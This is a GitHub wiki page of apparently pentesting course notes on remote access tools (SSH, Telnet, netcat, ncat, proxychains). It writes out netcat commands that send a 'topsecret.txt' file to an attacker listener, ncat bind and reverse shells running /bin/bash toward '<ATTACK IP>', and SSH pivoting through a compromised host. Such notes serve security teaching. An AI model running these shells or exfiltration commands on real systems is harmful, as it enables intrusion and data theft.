Pentesting Tools: Remote Access - Paiet/SEC-335 GitHub Wiki

  • Remote access tools
    • SSH
      • Defacto remote access protocol for Unix/Linux
      • Allows for access by means of...
        • Username:Password
        • SSH keys
    • TELNET
      • Older, but still around in legacy systems
        • You see this a lot in network equipment
      • Insecure
        • Uses plain text
        • You can sniff...
          • Passwords
          • Other sensitive info
    • NETCAT
      • Networking swiss-army knife
      • Creates just about any kind of TCP connection
      • Great for...
        • Banner grabbing
        • Shell access
          • REVERSE and BIND
        • Data exfil
          1. On ATTACK: nc -nvlp 9999 > exfil.txt
          2. On TARGET: nc -nv 10.0.0.? < topsecret.txt
    • NCAT
      • BIND
        1. On TARGET: ncat --exec /bin/bash --allow <ATTACK IP> -vnl 9999 --ssl
        2. On ATTACK: ncat -v <TARGET IP> 9999 --ssl
      • REVERSE
        1. On ATTACK: ncat --allow <TARGET IP> -vnl 9999 -ssl
        2. On TARGET: ncat --exec /bin/bash -v <ATTACK IP> 9999 --ssl
    • Proxychains
      • Pivoting tool
      • Allows you to use compromised host as a proxy for accessing otherwise unaccessible targets
      • Uses proxychains.conf
      • DEMO:
        1. ssh -D 127.0.0.1:8888 victim@compromised_host_ip
        2. Open new terminal
        3. Edit /etc/proxychains.conf
        • Add line to bottom: socks4 127.0.0.1 8888
        1. proxychains rdesktop remote_server_ip
⚠️ **GitHub.com Fallback** ⚠️